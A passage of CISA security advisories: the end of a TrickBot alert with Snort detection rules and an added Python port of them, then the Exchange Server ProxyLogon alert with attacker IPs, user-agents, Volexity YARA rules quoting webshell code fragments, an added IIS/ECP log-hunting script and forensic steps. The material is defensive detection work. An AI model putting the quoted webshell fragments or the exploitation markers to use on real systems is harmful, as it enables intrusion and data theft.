reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)   
alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'"; sid:1; rev:1; flow:established,to_server; content:"boundary=Arasfjasu7|0d 0a|"; http_header; content:"name=|22|proclist|22|"; http_header; content:!"Referer"; content:!"Accept"; content:"POST"; http_method; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|WinHTTP loader/1."; http_header; fast_pattern:only; content:".png|20|HTTP/1."; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}(?:\x3a\d{2,5})?$/mH"; content:!"Accept"; http_header; content:!"Referer|3a 20|"; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any $HTTP_PORTS -> any any (msg:"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'"; sid:1; rev:1; flow:established,from_server; content:"200"; http_stat_code; content:"Server|3a 20|Cowboy|0d 0a|"; http_header; fast_pattern; content:"content-length|3a 20|3|0d 0a|"; http_header; file_data; content:"/1/"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP URI POST contains C2 Exfil"; sid:1; rev:1; flow:established,to_server; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary"; http_header; fast_pattern; content:"User-Agent|3a 20|"; http_header; distance:0; content:"Content-Length|3a 20|"; http_header; distance:0; content:"POST"; http_method; pcre:"/^\/[a-z]{3}\d{3}\/.+?\.[A-F0-9]{32}\/\d{1,3}\//U"; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}$/mH"; content:!"Referer|3a|"; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET/POST contains '/56evcxv' (Trickbot)"; sid:1; rev:1; flow:established,to_server; content:"/56evcxv"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

alert icmp any any -> any any (msg:"TRICKBOT_ICMP_ANCHOR:ICMP traffic contains 'hanc'"; sid:1; rev:1; itype:8; content:"hanc"; offset:4; fast_pattern; classtype:bad-unknown;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomware)"; sid:1; rev:1; flow:established,to_server; content:"POST"; nocase; http_method; content:"host|3a 20|"; http_header; content:".onion.link"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:"data="; distance:0; within:5; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)"; sid:1; rev:1; flow:established,to_server; content:"host|3a 20|tpsci.com"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

Mitigations

CISA and FBI recommend that network defenders, in federal, state, local, tribal, and territorial governments and in the private sector, consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.

- Provide social engineering and phishing training to employees.
- Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.
- Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.
- Implement Group Policy Object and firewall rules.
- Implement an antivirus program and a formalized patch management process.
- Implement filters at the email gateway and block suspicious IP addresses at the firewall.
- Adhere to the principle of least privilege.
- Implement a Domain-based Message Authentication, Reporting & Conformance (DMARC) validation system.
- Segment and segregate networks and functions.
- Limit unnecessary lateral communications between network hosts, segments, and devices.
- Consider using application allowlisting technology on all assets to ensure that only authorized software executes and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.
- Enforce multi-factor authentication.
- Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
- Disable unnecessary services on agency workstations and servers.
- Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity.
- Monitor web traffic. Restrict user access to suspicious or risky sites.
- Maintain situational awareness of the latest threats and implement appropriate access control lists.
- Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against the network propagation modules used by TrickBot.
- Visit the MITRE ATT&CK Techniques pages (linked in Table 1 above) for additional mitigation and detection strategies.
- See CISA's Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.
- For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.
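The Snort rules above are chains of buffer-scoped content matches, and it is worth seeing exactly what two of them assert before deploying or porting them. The following Python is an added example written for this page (not a CISA tool and not part of the Alert): it ports the "TRICKBOT:HTTP URI POST contains C2 Exfil" rule and the "WinHTTP loader/1." rule so the same logic can be run over reassembled requests pulled from a proxy log or a PCAP carve. The sample requests are constructed for the example, not captures, and the header-block splitting is a simplification of Snort's http_header buffer (no normalization, no nocase).

```python
import re
from typing import List, Tuple

# Constructed sample requests for the example (not captures from the Alert).
EXFIL_POST = (
    b"POST /tot123/id.0123456789ABCDEF0123456789ABCDEF/90/ HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: multipart/form-data; boundary=------Boundary\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
    b"Content-Length: 60\r\n"
    b"\r\n"
    b"--------Boundary\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n\r\n"
)
BENIGN_UPLOAD = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: multipart/form-data; boundary=------Boundary\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Length: 60\r\n"
    b"Referer: http://192.0.2.10/form\r\n"
    b"\r\n"
    b"--------Boundary\r\n"
)
LOADER_GET = (
    b"GET /images/module.png HTTP/1.1\r\n"
    b"Host: 198.51.100.5:8082\r\n"
    b"User-Agent: WinHTTP loader/1.0\r\n"
    b"\r\n"
)
BROWSER_GET = (
    b"GET /images/module.png HTTP/1.1\r\n"
    b"Host: cdn.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: image/png\r\n"
    b"\r\n"
)


def split_request(raw: bytes) -> Tuple[bytes, bytes, bytes]:
    """Return (method, uri, header_block) of a raw HTTP/1.x request.

    header_block stands in for Snort's http_header buffer: the header lines
    without the request line or the body.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, _, headers = head.partition(b"\r\n")
    parts = request_line.split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    return parts[0], parts[1], headers


def _ordered(headers: bytes, *needles: bytes) -> bool:
    """Snort 'content; distance:0;' chain: each needle must follow the previous match."""
    pos = 0
    for needle in needles:
        pos = headers.find(needle, pos)
        if pos < 0:
            return False
        pos += len(needle)
    return True


def _host_is_ip(headers: bytes, allow_port: bool) -> bool:
    """Port of the ^Host: <IPv4>(:port)?$ pcre with the /mH modifiers (one header line)."""
    pattern = rb"Host: (?:\d{1,3}\.){3}\d{1,3}" + (rb"(?::\d{2,5})?" if allow_port else b"")
    return any(re.fullmatch(pattern, line) for line in headers.split(b"\r\n"))


# /^\/[a-z]{3}\d{3}\/.+?\.[A-F0-9]{32}\/\d{1,3}\//U : campaign tag, bot id, 32-hex id, counter
C2_EXFIL_URI = re.compile(rb"^/[a-z]{3}\d{3}/.+?\.[A-F0-9]{32}/\d{1,3}/")


def is_trickbot_c2_exfil(raw: bytes) -> bool:
    """Port of 'TRICKBOT:HTTP URI POST contains C2 Exfil'."""
    method, uri, headers = split_request(raw)
    return (
        method == b"POST"
        and _ordered(headers,
                     b"Content-Type: multipart/form-data; boundary=------Boundary",
                     b"User-Agent: ",
                     b"Content-Length: ")
        and C2_EXFIL_URI.match(uri) is not None
        and _host_is_ip(headers, allow_port=False)
        and b"Referer:" not in headers          # content:!"Referer|3a|"; http_header
    )


def is_trickbot_winhttp_loader(raw: bytes) -> bool:
    """Port of 'TRICKBOT:HTTP Client Header contains User-Agent: WinHTTP loader/1.'."""
    _method, _uri, headers = split_request(raw)
    return (
        b"User-Agent: WinHTTP loader/1." in headers
        and b".png HTTP/1." in raw              # unbuffered content: the request line qualifies
        and _host_is_ip(headers, allow_port=True)
        and b"Accept" not in headers            # also suppresses on Accept-Encoding, as Snort does
        and b"Referer: " not in headers
    )


def scan(requests: List[bytes]) -> List[Tuple[int, str]]:
    """Run both detections over raw requests; returns (index, signature name) hits."""
    hits = []
    for i, raw in enumerate(requests):
        if is_trickbot_c2_exfil(raw):
            hits.append((i, "TRICKBOT:HTTP URI POST contains C2 Exfil"))
        if is_trickbot_winhttp_loader(raw):
            hits.append((i, "TRICKBOT:WinHTTP loader"))
    return hits


if __name__ == "__main__":
    for idx, name in scan([EXFIL_POST, BENIGN_UPLOAD, LOADER_GET, BROWSER_GET]):
        print(idx, name)
```

The port keeps the semantics that make these rules precise: the three header matches are ordered (distance:0), the Host check only accepts a bare IPv4 literal, and the negated Referer and Accept matches mean a browser-shaped request never fires. The same strictness means a sample that adds an Accept header or uses a hostname is missed, so treat these as high-confidence, low-coverage rules and pair them with the broader ones above.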
Resources

- CISA Fact Sheet: TrickBot Malware
- MS-ISAC White Paper: Security Primer – TrickBot
- United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally
- CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware
- MITRE ATT&CK for Enterprise

References

[1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption
[2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit

Revisions

March 17, 2021: Initial Version
March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance

  • AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
    by CISA on 3 Marzo 2021 at 6:12 pm

Original release date: March 3, 2021 | Last revised: April 14, 2021

Summary

Note: This Alert was updated April 13, 2021, to provide further guidance.

Cybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.

This Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, it should assume network identity compromise and follow incident response procedures. If an organization finds no activity, it should apply available patches immediately and implement the mitigations in this Alert. The IOCs are also available in STIX format.

Technical Details

(Updated April 14, 2021): Microsoft's April 2021 Security Update newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.
Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:

- CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability is a Server-Side Request Forgery (SSRF) exploited through the Exchange Control Panel (ECP). It also allows the attacker to gain access to mailboxes and read sensitive information.
- CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.
  - CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
  - CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.

To locate a possible compromise through these CVEs, CISA encourages organizations to read the Microsoft Advisory. It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory database.

(Updated March 12, 2021): Microsoft Security Intelligence has released a tweet on DearCry ransomware being deployed on compromised on-premises Exchange Servers. Ransomware infections can have negative consequences for an affected organization, including: temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization's reputation.

(Updated April 12, 2021): CISA recommends organizations review Malware Analysis Report (MAR) MAR-10330097-1.v1 – DearCry Ransomware for detailed analysis, along with TTPs and IOCs.
(Updated March 12, 2021): CISA encourages organizations to review CISA's Ransomware web page for guidance and resources. Victims of ransomware should report it immediately to CISA at www.us-cert.gov/report, a local FBI Field Office, or a Secret Service Field Office.

Tactics, Techniques and Procedures

(Updated March 10, 2021): Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the Test-ProxyLogon.ps1 script as soon as possible to help determine whether their systems are compromised.

(Updated March 16, 2021): Note: Microsoft has released the Exchange On-premises Mitigation Tool (EOMT.ps1), which can automate portions of both the detection and patching process. Microsoft stated the following along with the release: "[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." Review the EOMT.ps1 blog post for directions on using the tool.

(Updated March 10, 2021): CISA recommends investigating for signs of a compromise from at least January 1, 2021 through the present.

(Updated April 12, 2021): CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of the webshells being leveraged by actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware.
- AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell
- AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell
- AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell
- AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell
- AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell
- AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell
- AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell
- AR21-084A: MAR-10329496-1.v1: China Chopper Webshell
- AR21-084B: MAR-10329499-1.v1: China Chopper Webshell
- AR21-102A: MAR-10331466-1.v1: China Chopper Webshell

(Updated March 13, 2021): A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are used for the following purposes:

- To harvest and exfiltrate sensitive data and credentials;
- To upload additional malware, for example to create a watering hole for infection and scanning of further victims;
- To use as a relay point to issue commands to hosts inside the network without direct internet access;
- To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises of additional external networks. This could occur if the adversary intends to maintain long-term persistence.

(Updated March 13, 2021): For more information, see TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance.

The majority of the TTPs in this section are sourced from a blog post from Volexity, a third-party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
Volexity has observed the following files as targets of HTTP POST requests:

- /owa/auth/Current/themes/resources/logon.css
- /owa/auth/Current/themes/resources/owafont_ja.css
- /owa/auth/Current/themes/resources/lgnbotl.gif
- /owa/auth/Current/themes/resources/owafont_ko.css
- /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
- /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf

Administrators should search the ECP server logs for the following string (or something similar):

S:CMD=Set-OabVirtualDirectory.ExternalUrl='

The logs can be found at <exchange install path>\Logging\ECP\Server\.

To determine possible webshell activity, administrators should search for .aspx files in the following paths:

- \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or its subfolders)
- \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file, or modified file, that is not part of a standard install)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ (any .aspx file in this folder or its subfolders)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\ (any .aspx file in this folder or its subfolders)

Administrators should search the web logs for requests to the /owa/auth/Current directory carrying the following non-standard user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary.
These should not be taken as definitive IOCs:

- DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)
- facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)
- Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)
- Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
- Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
- Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)
- Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)
- Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36

Volexity observed these user-agents in conjunction with exploitation of /ecp/ URLs:

- ExchangeServicesClient/0.0.0.0
- python-requests/2.19.1
- python-requests/2.25.1

These user-agents were also observed having connections to post-exploitation web-shell access:

- antSword/v2.1
- Googlebot/2.1+(+http://www.googlebot.com/bot.html)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

As with the non-standard user-agents, responders can examine Internet Information Services (IIS) logs from Exchange Servers to identify possible historical activity. Also as with the non-standard user-agents, these should not be taken as definitive IOCs:

- POST /owa/auth/Current/
- POST /ecp/default.flt
- POST /ecp/main.css
- POST /ecp/<single char>.js

Volexity has seen attackers leverage the following IP addresses.
Although these are tied to virtual private servers (VPSs) and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:

- 103.77.192[.]219
- 104.140.114[.]110
- 104.250.191[.]110
- 108.61.246[.]56
- 149.28.14[.]163
- 157.230.221[.]198
- 167.99.168[.]251
- 185.250.151[.]72
- 192.81.208[.]169
- 203.160.69[.]66
- 211.56.98[.]146
- 5.254.43[.]18
- 5.2.69[.]14
- 80.92.205[.]81
- 91.192.103[.]43

Volexity has also provided the following YARA signatures, which can be run within your network to assist in finding signs of a compromise.

rule webshell_aspx_simpleseesharp : Webshell Unclassified
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
        hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"

    strings:
        $header = "<%@ Page Language=\"C#\" %>"
        $body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"

    condition:
        $header at 0 and
        $body and
        filesize < 1KB
}

rule webshell_aspx_reGeorgTunnel : Webshell Commodity
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "A variation on the reGeorg tunnel webshell"
        hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"
        reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"

    strings:
        $s1 = "System.Net.Sockets"
        $s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"
        // a bit more experimental
        $t1 = ".Split('|')"
        $t2 = "Request.Headers.Get"
        $t3 = ".Substring("
        $t4 = "new Socket("
        $t5 = "IPAddress ip;"

    condition:
        all of ($s*) or
        all of ($t*)
}

rule webshell_aspx_sportsball : Webshell Unclassified
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "The SPORTSBALL webshell allows attackers to upload files or execute commands on the system."
        hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"

    strings:
        $uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"
        $uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="

        $var1 = "Result.InnerText = string.Empty;"
        $var2 = "newcook.Expires = DateTime.Now.AddDays("
        $var3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"
        $var4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""
        $var5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""
        $var6 = "<input type=\"submit\" value=\"Upload\" />"

    condition:
        any of ($uniq*) or
        all of ($var*)
}

A list of webshell hashes has also been provided by Microsoft:

- b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
- 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
- 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
- 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
- 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
- 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
- 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
- 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Note: this is not an all-inclusive list of indicators of compromise, and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not find any of the IOCs in this Alert in their network traffic may nevertheless have been compromised. CISA recommends following the guidance in the Microsoft Advisory to check your servers for any signs of a compromise.
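The user-agents, POST targets, and IP addresses above are meant to be hunted in the Exchange IIS logs, and the Set-OabVirtualDirectory string in the ECP server logs. The following Python is an added example written for this page (it is not part of the Alert, of Volexity's material, or of Microsoft's Test-ProxyLogon.ps1): it parses W3C-format IIS log lines by their #Fields directive, so column order does not matter between servers, and flags entries that match the published indicators, then does the plain substring search over ECP log lines. The IOC sets are transcribed from the Alert; the log lines are constructed for the example and are not real captures.

```python
import re
from typing import Dict, Iterable, List, Tuple

# IOC sets transcribed from the Alert. IIS writes spaces in cs(User-Agent) as '+',
# which is why the published user-agent strings carry '+' characters.
ECP_EXPLOIT_AGENTS = {
    "ExchangeServicesClient/0.0.0.0",
    "python-requests/2.19.1",
    "python-requests/2.25.1",
}
WEBSHELL_AGENTS = {
    "antSword/v2.1",
    "Googlebot/2.1+(+http://www.googlebot.com/bot.html)",
    "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
}
# Kept defanged as published and re-fanged once, so the list can be pasted from the Alert.
DEFANGED_IPS = [
    "103.77.192[.]219", "104.140.114[.]110", "104.250.191[.]110", "108.61.246[.]56",
    "149.28.14[.]163", "157.230.221[.]198", "167.99.168[.]251", "185.250.151[.]72",
    "192.81.208[.]169", "203.160.69[.]66", "211.56.98[.]146", "5.254.43[.]18",
    "5.2.69[.]14", "80.92.205[.]81", "91.192.103[.]43",
]
ATTACKER_IPS = {ip.replace("[.]", ".") for ip in DEFANGED_IPS}

# POST targets from the Alert: static OWA resources (never legitimately POSTed to)
# and the ECP paths seen with post-exploitation web-shell access.
SUSPICIOUS_POST_RE = re.compile(
    r"^/owa/auth/Current/|^/ecp/default\.flt$|^/ecp/main\.css$|^/ecp/[^/]\.js$",
    re.IGNORECASE,
)
# Marker of the OAB virtual-directory write used to drop the web shell (ECP server log).
ECP_EXPLOIT_MARKER = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='"


def parse_iis_log(lines: Iterable[str]) -> List[Tuple[int, Dict[str, str]]]:
    """Parse W3C-format IIS log lines, naming columns from the #Fields directive.

    Returns (1-based line number, {field: value}) pairs; directive lines and
    truncated lines are skipped rather than mis-aligned.
    """
    fields: List[str] = []
    rows: List[Tuple[int, Dict[str, str]]] = []
    for lineno, line in enumerate(lines, 1):
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            rows.append((lineno, dict(zip(fields, values))))
    return rows


def hunt_iis(lines: Iterable[str]) -> List[Tuple[int, str, str, List[str]]]:
    """Return (line, client IP, 'METHOD uri', reasons) for every suspicious IIS entry."""
    findings = []
    for lineno, row in parse_iis_log(lines):
        method = row.get("cs-method", "").upper()
        uri = row.get("cs-uri-stem", "")
        agent = row.get("cs(User-Agent)", "")
        client = row.get("c-ip", "")
        reasons = []
        if method == "POST" and SUSPICIOUS_POST_RE.match(uri):
            reasons.append("POST to exploit/web-shell path")
        if agent in ECP_EXPLOIT_AGENTS:
            reasons.append("user-agent seen in /ecp/ exploitation")
        if agent in WEBSHELL_AGENTS:
            reasons.append("user-agent seen with web-shell access")
        if client in ATTACKER_IPS:
            reasons.append("published attacker IP")
        if reasons:
            findings.append((lineno, client, f"{method} {uri}", reasons))
    return findings


def hunt_ecp(lines: Iterable[str]) -> List[int]:
    """1-based line numbers of ECP server-log lines containing the OAB ExternalUrl write."""
    return [n for n, line in enumerate(lines, 1) if ECP_EXPLOIT_MARKER in line]


# Constructed sample logs for the example (not real captures).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) cs(Referer) sc-status
2021-03-02 09:58:10 10.0.0.5 GET /owa/ - 443 10.0.0.41 Mozilla/5.0+(Windows+NT+10.0)+Chrome/88.0 - 200
2021-03-02 10:01:33 10.0.0.5 POST /ecp/y.js - 443 192.0.2.55 python-requests/2.25.1 - 200
2021-03-02 10:02:05 10.0.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 5.2.69.14 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) - 200
2021-03-02 10:03:47 10.0.0.5 POST /ecp/default.flt - 443 198.51.100.7 antSword/v2.1 - 200
2021-03-02 10:04:12 10.0.0.5 GET /ecp/default.flt - 443 10.0.0.41 Mozilla/5.0+(Windows+NT+10.0)+Chrome/88.0 - 200
""".splitlines()

SAMPLE_ECP_LOG = [
    "DateTime,RequestId,ClientIpAddress,Action",
    "2021-03-02T10:05:19.442Z,a1b2c3d4,192.0.2.55,Get-OabVirtualDirectory",
    "2021-03-02T10:05:20.017Z,a1b2c3d4,192.0.2.55,S:CMD=Set-OabVirtualDirectory.ExternalUrl='http://o/#<redacted>'",
]

if __name__ == "__main__":
    for lineno, client, request, reasons in hunt_iis(SAMPLE_IIS_LOG):
        print(f"IIS line {lineno}: {client} {request} -> {'; '.join(reasons)}")
    print("ECP lines with OAB ExternalUrl write:", hunt_ecp(SAMPLE_ECP_LOG))
```

Point the functions at the real files (IIS logs under inetpub\logs\LogFiles\W3SVC1\, ECP logs under <exchange install path>\Logging\ECP\Server\) one file at a time, and treat a single reason as a lead rather than a verdict: as the Alert says, the crawler-style user-agents are not definitive IOCs, whereas a POST to a static OWA resource from an unknown external address, or any Set-OabVirtualDirectory line whose ExternalUrl is not a plain URL, deserves immediate triage.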
Conduct Forensic Analysis

Should your organization see evidence of compromise, your incident response should begin with forensic analysis to collect artifacts and perform triage. The following list of recommendations describes how to conduct forensic analysis using various tools. Although the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics. While collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and the impact on the operating system itself. Ideally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.

Key artifacts for triage that should be collected:

- Memory
- All registry hives
- All Windows event logs
- All web logs

Memory can be collected with a variety of free tools (e.g., FTK Imager by AccessData, RAM Capture by Belkasoft). Registry hives and Windows event logs can be collected with a variety of free tools as well (e.g., FTK Imager, Kroll Artifact Parser And Extractor [KAPE]). Web logs can also be collected with a variety of free tools (e.g., FTK Imager).

Windows Artifact Collection Guide

Execute the following steps in order.

1) Download the latest FTK Imager from https://accessdata.com/product-download/. Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product's User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
2) Collect memory from the live system using FTK Imager.
See Memory Capture with FTK Imager (below) for instructions. Note: Download and copy the "FTK Imager" folder to an external drive. Run FTK Imager.exe from the FTK Imager folder on the external drive. Wait until the memory collection is complete before proceeding to step 3.
3) Collect important system artifacts using KAPE. See KAPE Collection Procedure (below). Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from the external drive.
4) Collect a disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the "FTK Imager" folder on the external drive.

Memory Capture with FTK Imager

1) Open FTK Imager. Log into the system with Administrator privileges and launch "FTK Imager." Note: Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
2) Open "Capture Memory." Select "Capture Memory…" from the File menu.

Figure 1: FTK Imager – Capture Memory Command

